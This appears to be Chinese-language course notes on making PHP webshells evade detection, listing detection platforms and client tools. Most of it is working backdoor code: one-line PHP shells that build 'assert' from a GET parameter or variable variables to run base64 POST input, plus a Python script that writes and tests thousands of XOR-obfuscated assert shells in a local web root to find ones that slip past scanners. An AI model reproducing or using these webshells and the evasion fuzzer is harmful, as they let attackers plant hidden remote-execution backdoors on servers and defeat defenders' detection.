webshell检测平台
https://scanner.baidu.com/#/pages/intro
https://ti.aliyun.com/#/webshell
基础-脚本后门控制原理-代码解释
对比工具代码-菜刀&蚁剑&冰蝎&哥斯拉等
原理-脚本后门查杀机制-函数&行为
对比WAF规则-函数匹配&工具指纹等
代码-脚本后门免杀变异-覆盖&传参
1.php 传参带入
<?php $a=$_GET['a']; $aa=$a.'ert'; $aa(base64_decode($_POST['x'])); ?>
?a=ass
x=cGhwaW5mbygpOw==
2.php 变量覆盖
<?php $a='b'; $b='assert'; $$a(base64_decode($_POST['x'])); ?>
x=cGhwaW5mbygpOw==
代码-脚本后门免杀变异-异或&加密
3.php 加密变异
4.php 异或运算
import requests import time import threading,queue def string(): while not q.empty(): filename=q.get() url = 'http://127.0.0.1:8081/x/' + filename datas = { 'x': 'phpinfo();' } result = requests.post(url, data=datas).content.decode('utf-8') if 'XIAODI-PC' in result: print('check->'+filename+'->ok') else: print('check->'+filename+'->no') time.sleep(1) def shell_test_check(): url='http://127.0.0.1:8081/x/33xd64.php' datas={ 'x':'phpinfo();' } result=requests.post(url,data=datas).content.decode('utf-8') print(result) if 'XIAODI-PC' in result: print('ok') if __name__ == '__main__': q=queue.Queue() for i in range(1, 127): for ii in range(1, 127): payload = "'" + chr(i) + "'" + '^' + "'" + chr(ii) + "'" code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>" filename = str(i) + 'xd' + str(ii) + '.php' q.put(filename) with open('D:/phpstudy/PHPTutorial/WWW/x/' + filename, 'a') as f: f.write(code) f.close() print('Fuzz文件生成成功') for x in range(20): t=threading.Thread(target=string) t.start()
拓展-脚本后门脚本类型-JSP&ASPX
5.php 脚本生成器
Webshell-venom
ASP PHP JSP ASPX
